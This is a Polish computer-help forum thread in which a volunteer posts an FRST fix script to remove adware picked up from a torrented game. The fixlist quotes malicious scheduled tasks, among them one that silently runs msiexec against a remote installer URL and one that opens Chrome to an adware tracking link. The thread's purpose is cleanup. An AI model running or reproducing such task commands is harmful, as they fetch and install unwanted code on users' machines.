Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Wyskakujące okna w tle podczas używania komputera

123Anonim123 28 Paź 2018 18:48 60 1
  • #1 28 Paź 2018 18:48
    123Anonim123
    Poziom 1  

    Podczas robienia czegoś na komputerze pojawiaja mi sie losowe okna, jakies reklamy.
    Dzieje sie to po zainstalowaniu gry przez torrenty. Grę już odinstalowałem. Podsyłam logi

    0 1
  • #2 28 Paź 2018 19:01
    Kolobos
    Spec od komputerów

    Wykonaj Fixlsit.txt dla FRST:
    CloseProcesses:
    Task: {203BB6FC-E6A8-4F3B-A42C-AE961ABBC6B3} - \lukas -> Brak pliku <==== UWAGA
    Task: {44038B5B-CC2A-414F-93D4-47F6496FBF7F} - System32\Tasks\Opera scheduled Autoupdate 1530631792 => C:\Users\lukas\AppData\Local\Programs\Opera\launcher.exe
    Task: {5816F559-95F7-4146-809B-3EBE37BB468D} - System32\Tasks\{1AD95759-563F-E2D0-1EAD-0941E230D0AD} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://mynewsfor.com/cl/?guid=g45ynlvhnr6l1bg12d188jzas5k5zj75&prid=1&pid=4_1324_0
    C:\Program Files (x86)\eYoEUi.exe
    Task: {9992ABD0-0EEC-4382-9351-945911ADB902} - System32\Tasks\{9D49D9AE-CAEB-6B94-9F20-3A9BA6E9515D} => C:\Program Files (x86)\eYoEUi.exe [2018-04-12] (Microsoft Corporation)
    Task: {A1AB176D-721B-4C50-98C5-BCF6B4C5AFB2} - System32\Tasks\{34290461-17AB-DB28-51C8-C03B19C28EFB} => "msiexec.exe" -ihxxp://inthemel.info/uk2n6rt7kv09.uny -q
    AlternateDataStreams: C:\ProgramData:NT [40]
    AlternateDataStreams: C:\ProgramData:NT2 [692]
    AlternateDataStreams: C:\Users\All Users:NT [40]
    AlternateDataStreams: C:\Users\All Users:NT2 [692]
    AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
    AlternateDataStreams: C:\ProgramData\Application Data:NT2 [692]
    AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT [40]
    AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT2 [692]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [692]
    AlternateDataStreams: C:\Users\lukas\Dane aplikacji:NT [40]
    AlternateDataStreams: C:\Users\lukas\Dane aplikacji:NT2 [692]
    AlternateDataStreams: C:\Users\lukas\AppData\Roaming:NT [40]
    AlternateDataStreams: C:\Users\lukas\AppData\Roaming:NT2 [692]
    AlternateDataStreams: C:\Users\Public\AppData:CSM [470]
    HKU\S-1-5-21-1436225164-2552023798-1173228244-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
    HKU\S-1-5-21-1436225164-2552023798-1173228244-1001\...\MountPoints2: {92b8d6ef-af82-11e8-a26a-4ccc6aae892e} - "D:\HiSuiteDownLoader.exe"
    HKU\S-1-5-21-1436225164-2552023798-1173228244-1001\...\MountPoints2: {af4daa11-4300-11e8-a246-4ccc6aae892e} - "D:\HiSuiteDownLoader.exe"
    GroupPolicy\User: Ograniczenia ? <==== UWAGA
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avast.com/AV772/
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avast.com/AV772/search/web?q={searchTerms}




    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKU\S-1-5-21-1436225164-2552023798-1173228244-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avast.com/AV772/search/web?q={searchTerms}
    HKU\S-1-5-21-1436225164-2552023798-1173228244-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avast.com/AV772/
    SearchScopes: HKLM-x32 -> {8C31F27B-BE8A-4e4b-A478-17760AF1F5D9} URL = hxxps://search.avast.com/AV772/search/web?q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1436225164-2552023798-1173228244-1001 -> DefaultScope {8C31F27B-BE8A-4e4b-A478-17760AF1F5D9} URL = hxxps://search.avast.com/AV772/search/web?q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1436225164-2552023798-1173228244-1001 -> {8C31F27B-BE8A-4e4b-A478-17760AF1F5D9} URL = hxxps://search.avast.com/AV772/search/web?q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1436225164-2552023798-1173228244-1001 -> {C0C3A6C6-03BC-4195-8FCB-AEA091301353} URL = hxxps://pl.search.yahoo.com/yhs/search?hspart...__1_0__ya__ch_WCYID10454__180623__yaie&p={searchTerms}
    C:\Users\lukas\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnainbefehfglngmjpbmilfmlbmicacf
    CHR NewTab: Default -> Not-active:"chrome-extension://hnainbefehfglngmjpbmilfmlbmicacf/visual-bookmarks.html"
    C:\Users\lukas\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpabpfikknflecblchhfkpkcpilbkfcd
    CHR Extension: (MyJSCript) - C:\Users\lukas\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpabpfikknflecblchhfkpkcpilbkfcd [2018-10-20]
    CHR Extension: (Пульс) - C:\Users\lukas\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnainbefehfglngmjpbmilfmlbmicacf [2018-09-06]
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [hnainbefehfglngmjpbmilfmlbmicacf] - hxxps://clients2.google.com/service/update2/crx
    2018-10-28 15:43 - 2018-10-28 15:43 - 000000000 ____D C:\_OTL
    2018-10-20 22:26 - 2018-10-27 21:42 - 000002834 _____ C:\WINDOWS\System32\Tasks\{1AD95759-563F-E2D0-1EAD-0941E230D0AD}
    2018-10-20 22:26 - 2018-10-27 21:42 - 000002780 _____ C:\WINDOWS\System32\Tasks\{9D49D9AE-CAEB-6B94-9F20-3A9BA6E9515D}
    2018-10-20 22:26 - 2018-10-27 21:42 - 000002636 _____ C:\WINDOWS\System32\Tasks\{34290461-17AB-DB28-51C8-C03B19C28EFB}
    2018-04-12 00:34 - 2018-04-12 00:34 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\eYoEUi.exe
    2018-04-12 00:34 - 2018-04-12 00:34 - 000060416 ____N (Microsoft Corporation) C:\Users\lukas\AppData\Roaming\UDiImfXUoIA.exe

    Po wykonaniu usun katalog C:\FRST i to wszystko.

    0